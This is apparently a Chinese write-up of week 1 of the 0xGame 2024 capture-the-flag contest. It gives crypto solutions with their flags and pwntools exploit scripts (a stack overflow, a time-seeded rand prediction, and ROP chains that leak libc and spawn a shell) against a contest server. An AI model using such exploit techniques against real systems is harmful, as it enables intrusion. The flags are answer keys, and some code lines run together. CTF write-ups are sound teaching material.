[0xGame 2024] week1

这一段时间新生赛比较多。

Crypto

Caesar Cipher

厨子一把梭

Code

编码，m0 + long_to_bytes(m1) + bytes.fromhex(m2)+b64decode(m3)

Code-Vigenere

维吉尼亚，通过头爆破key

key = 'owccl'
#0xGame{acb94092-e8bc-4963-88f6-4fcadbbfb6c7}

Number-Theory-CRT

 RSA,N非常小，只是e与phi有公因子2，先解RSA再有限域开根号，得到的解再试一下。

n,e = (1022053332886345327, 294200073186305890)
c = 107033510346108389factor(n)
#970868179 * 1052721013
phi = 970868178 * 1052721012
d = invese_mod(e//2, phi)
m2 = pow(c,d,n)P.<x> = PolynomialRing(Zmod(n))
f = x^2 - m2
res = f.roots(multiplicities=False)for i in res:MD5(int(i))'''
'127016d0be858ef48a99723710ad4d49'
'f4107420d94cc7037114376d8566d4ef'
'3932f6728585abbf751a212f69276d3e'
'15820afdb9a129e89e40e57f40ff8de9'
'''
#0xGame{127016d0be858ef48a99723710ad4d49}

RSA-Baby

 明显比上题还简单，连有限域开根号都免了

RSA-Easy

这俩题是不是重了。

PWN

test your nc

test your pwntools

stack overflow

略

positive

-1绕过加溢出

from pwn import *
context(arch='amd64', log_level='debug')p = remote('47.97.58.52', 40002)
pay = b'-1  '+b'A'*0x38+flat(0x401272)
p.sendafter(b':', pay)
p.interactive()

find_me

ctypes的用法，用时间的随机数作种子，全世界时间都是相同的。

from pwn import *
from ctypes import *
import timeclibc = cdll.LoadLibrary("./libc.so.6")context(arch='amd64', log_level='debug')p = remote('47.97.58.52', 40003)
#p = process('./pwn')seed = int(time.time())
clibc.srand(seed)
v =clibc.rand()%100
fid = 3+v
print(f"{seed = :x} {fid = :x}")#gdb.attach(p, "b*0x401339\nc")p.recvuntil(b'Your turn!\n')
p.send(b'0   ')
p.send(str(fid).encode().ljust(4,b' ')) #read(3)p.send(b'1   ')
p.send(b'0   ') #write(1, ...)p.interactive()

where_is_my_binsh

都是栈溢出啊

from pwn import *
context(arch='amd64', log_level='debug')elf = ELF('./pwn')
pop_rdi = 0x401323p = remote('47.97.58.52', 40004)
#p = process('./pwn')p.send(b'/bin/sh'.ljust(0x10, b'\0'))
p.send(b'A'*0x18 + flat(pop_rdi+1, pop_rdi, 0x404090, elf.plt['system']))p.interactive()

ret2csu

栈溢出泄露libc再getshell

from pwn import *
context(arch='amd64', log_level='debug')elf = ELF('./pwn')
libc = ELF('./libc.so.6')
pop_rdi = 0x00000000004013c3 # pop rdi ; ret
pop_rsi = 0x00000000004013c1 # pop rsi ; pop r15 ; retp = remote('47.97.58.52', 40005)
#p = process('./pwn')
#gdb.attach(p, "b*0x401357\nc")p.sendafter(b"The little doll is tired, say goodnight to her~\n", b'/bin/sh'.ljust(0x10, b'\0'))
p.sendafter(b"What else do you want to do?\n\0", b'\0'*0x18 + flat(pop_rdi, 1, pop_rsi, elf.got['write'], 0, elf.plt['write'], elf.sym['main']))
p.recvuntil(b"Her sleeping face is lovely, right? Time to go.\n\0")
libc.address = u64(p.recv(8)) - libc.sym['write']
print(f"{libc.address = :x}")p.sendafter(b"The little doll is tired, say goodnight to her~\n", b'/bin/sh'.ljust(0x10, b'\0'))
p.sendafter(b"What else do you want to do?\n\0", b'\0'*0x18 + flat(pop_rdi, 0x404090, libc.sym['system']))p.interactive()

Rev

BabyBase

BinaryMaster

SignSign

前3略，IDA打开就知道了

Xor-Beginning

异或

Xor-Endian

同上